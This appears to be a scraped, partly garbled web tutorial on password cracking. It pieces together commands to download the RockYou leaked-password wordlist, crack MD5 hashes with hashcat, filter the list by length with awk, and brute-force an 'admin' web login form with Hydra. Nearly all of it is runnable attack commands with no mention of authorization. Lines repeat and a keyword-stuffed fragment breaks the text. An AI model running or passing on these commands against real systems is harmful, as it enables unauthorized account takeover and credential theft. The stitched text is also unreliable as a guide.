Open a terminal (Linux/macOS) or WSL (Windows).
Example – Download RockYou:
# Download the compressed file
wget https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt.gz
Several publicly available wordlists exist. Below are the most common, reliable sources. download password wordlisttxt file work
Hashcat expects a hash file and a wordlist. Open a terminal (Linux/macOS) or WSL (Windows)
# Basic syntax
hashcat -m 0 -a 0 hash.txt rockyou.txt
If the target requires 8-12 characters, remove shorter/longer passwords: Once you have wordlist
awk 'length($0) >= 8 && length($0) <= 12' rockyou.txt > filtered_rockyou.txt
Once you have wordlist.txt, a common next step is using it with a password testing tool. Example with Hydra (web login brute-force):
hydra -l admin -P wordlist.txt 192.168.1.10 http-post-form "/login:user=^USER^&pass=^PASS^:F=incorrect"
Or with Hashcat (cracking a password hash):
hashcat -m 0 -a 0 hash.txt wordlist.txt